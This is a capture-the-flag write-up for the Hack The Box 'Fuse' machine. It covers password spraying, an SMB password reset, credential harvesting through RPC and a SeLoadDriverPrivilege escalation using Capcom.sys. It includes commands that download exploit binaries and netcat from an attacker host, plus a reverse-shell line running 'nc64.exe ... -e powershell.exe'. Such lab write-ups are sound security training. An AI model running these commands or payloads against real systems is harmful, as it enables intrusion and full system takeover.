---
title: HTB Fuse
date: 2020-11-02
---


# HTB : FUSE

## Initial Recon

```
sudo nmap -sS -sV -sC 10.10.10.193 > rec_ini
```

While the scan was going on I tried checking if there is a webserver or not. It turns out that it is trying to access


```
http://fuse.fabricorp.local/papercut/logs/html/index.htm
```

So change the /etc/hosts file :


```
10.10.10.193 fuse.fabricorp.local
```

Add the above line to /etc/hosts

Then reloading the webpage looks like this : 

![](Pictures/web_page.png)


On checking the nmap scan, we get the following : 


![](Pictures/rec_ini.png)


Let the full port scan, run in the background.

```
sudo nmap -p- -T5 10.10.10.193 > all_ports
```

![](Pictures/all_ports.png)

Though it doesn't give anything useful.

## Checking the web server


In the landing page we get  a few csv files and some usernames, which can be used later on.


```
sthompson
bhult
administrator
pmerton
tlavel
bnielson
```

There are also some cvs/excel files corresponding to them.

From the first CSV file we get another user `bnielson`

## Trying the ldap


```
ldapsearch -h 10.10.10.193 -x -s base namingcontexts
```

First we try to check the naming contexts using simple authentication.

We get the following naming contexts:

```
dn:
namingContexts: DC=fabricorp,DC=local
namingContexts: CN=Configuration,DC=fabricorp,DC=local
namingContexts: CN=Schsthompsonema,CN=Configuration,DC=fabricorp,DC=local
namingContexts: DC=DomainDnsZones,DC=fabricorp,DC=local
namingContexts: DC=ForestDnsZones,DC=fabricorp,DC=local
```


However, when I tried to further enumerate the namingcontexts, I got error.

![](Pictures/ldap_error.png)


## Enumerating the smb shares

Upon trying to authenticate in the smb shares without any usernames or passwords, I got that no shares were listed.

```
smbclient -L //10.10.10.193
Enter WORKGROUP\dosxuz's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
```


So we need to bruteforce the username and password which have the permission to mount smb shares.

### Generating passwords file using cew


For this bruteforce, we need a password file. To generate a password file I used cewl.

```
cewl -d 3 http://fuse.fabricorp.local/papercut/logs/html/index.htm -w ~/fuse/pass
```

![](Pictures/compiled_pass.png)


### Bruteforcing the passwords and usernames

To bruteforce the usernames and passwords I used hydra:</br>
After checking the number of passwords, it turns out to be 157.

```
wc pass 
 157  157 1089 pass
```

That multiplies by the 6 usernames we found is `942`

Howevver, we know that the minimum length of smb passwords is 8, so we can sort out the words of length greater than 7.

```
cat pass | sort -u | awk 'length($0) > 7' > t
```

This will sort out the passwords greater than length 7.</br>

```
cp t pass
```

However, even after bruteforcing with these passwords I didn't get anything. So I generated my own passwords using hashcat.

```
ashcat --force --stdout pass -r /usr/share/oclHashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u >  t
```

This will generate the passwords using the given rules and sort them uniquely and store them.</br>
However, we must shorten the wordlist more.

Sorting out words greater than 9 makes the wordlist significantly shorter.

```
cat pass | awk 'length($0) > 9' | sort -u | wc
  13323   13323  164500
```

It turns out that 3 users had the same password :

![](Pictures/pas_found.png)

That is : 

```
bhult
tlavel
bnielson
```

Had the same password `Fabricorp01` 

Now we can try to login to the smb server.

```
smbclient -L //10.10.10.193 -U bhult
```

But for every username, the sameoutput was given, i.e the password must change:

![](Pictures/pass_must_change.png)

The smbpasswd man page documents the password change options.

```
sudo smbpasswd -r 10.10.10.193 -U tlavel
```

![](Pictures/changed.png)

Now we can list and mount the shares

![](Pictures/smb_share.png)

However, I wasn't able to mount the smb shares as they seemed to be read only.


## Trying the RPC  

Instead I tried login into the RPC using the new credentials.


```
rpcclient -U bhult 10.10.10.193
```

```
rpcclient $> enumdomusers
```

![](Pictures/new_users.png)

While trying to enumerate the svc accounts. I found out that there is a password for the svc-print account.</br>
Therefore, we get the creds : 

```
svc-print : $fab@s3Rv1ce$1
```

## Getting shell


Now we can use evil-winrm to get a shell.

```
evil-winrm -u 'svc-print' -p '$fab@s3Rv1ce$1' -i 10.10.10.193
```

![](Pictures/shell.png)

![](Pictures/user.png)


## Root

Upon checking the user priviledges, I get the following : 

```
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```


There is the SeLoadDriverPrivilege PoC exploitation technique. It can be found in this artcle 

[PoC for privilege escalation](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)

Also, this privilege is enabled, so we don't need to get this token.

## Loading the driver from unprivileged account


To load the driver from our service account, we need a PoC exploit, which can found [here](https://github.com/VbScrub/VbLoadDriver)</bt>

For this the driver Capcom.sys is being used.

The exploit capcom can be foun [here](https://github.com/tandasat/ExploitCapcom)

The capcom.sys can be fonud [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)

For Compiling the EoPLoadDriver exploit.


## Exploitation

Transfer the exploit payloads from your machine to the target machine.

```
$url = "http://10.10.14.185/VbLoadDriver.exe"
$outpath = "C:\temp\VbLoadDriver.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
```

```
$url = "http://10.10.14.185/ExploitCapcom.exe"
$outpath ="C:\temp\ExploitCapcom.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
```

```
$url = "http://10.10.14.185/Capcom.sys"
$outpath = "C:\Users\svc-print\Downloads\Capcom.sys"
Invoke-WebRequest -Uri $url -OutFile $outpath
```

To use this exploit we also need the nc.exe to get a reverse shell.


```
$url = "http://10.10.14.185/nc64.exe"
$outpath = "C:\Users\svc-print\Downloads\nc64.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath
```

We also need to create a batch file which will execute the nc.exe and connect back to our listener.

```
$url = "http://10.10.14.185/netcat.bat"
$outpath = "C:\Users\svc-print\Downloads\netcat.bat"
Invoke-WebRequest -Uri $url -OutFile $outpath
```


The netcat.bat file should contain the following : 

```
C:\temp\nc64.exe 10.10.14.185 1331 -e powershell.exe
```

Run the exploits

```
*Evil-WinRM* PS C:\temp> .\VbLoadDriver.exe HKU\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService C:\temp\Capcom.sys                                           
VbLoadDriver                                                                                                                                                                                   
http://vbscrub.com                                                                                                                                                                             
                                                                                                                                                                                               
Attempting to enable SeLoadDriverPrivilege...                                                                                                                                                  
Successfully enabled privilege                                                                                                                                                                 
Creating registry values...                                                                                                                                                                    
Successfully created registry values                                                                                                                                                           
Loading driver...                                                                                                                                                                              
NtLoadDriver returned error code 0xC000010E                                                                                                                                                    
An instance of the service is already running                                                                                                                                                  
```

```
*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002018A280008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
```

Start the netcat listener before this : 

```
nc -nlvp 1331
```

![](Pictures/root.png)


To get the user SID use

```
whoami /user
```


User HKU instead of HKLM and make sure the path are correct.


# Tips for Compiling the Code


1) Download and unzip the project file from github</br>
2) Open the function in VS19</br>
3) Select the sln file</br>
4) Select Release option and Build it</br>
5) If there is any problem like the missing Microsoft.Cpp.Default.props, change the VCTargets path in the system environment variable to the VCTargets file in VS 2017 folder.</br>
6) Then change the VS version to 2017 using cmd.</br>
7) VS might prompt you later on to install some additional files.


**Note: the solution to most of these problems can be found online** 

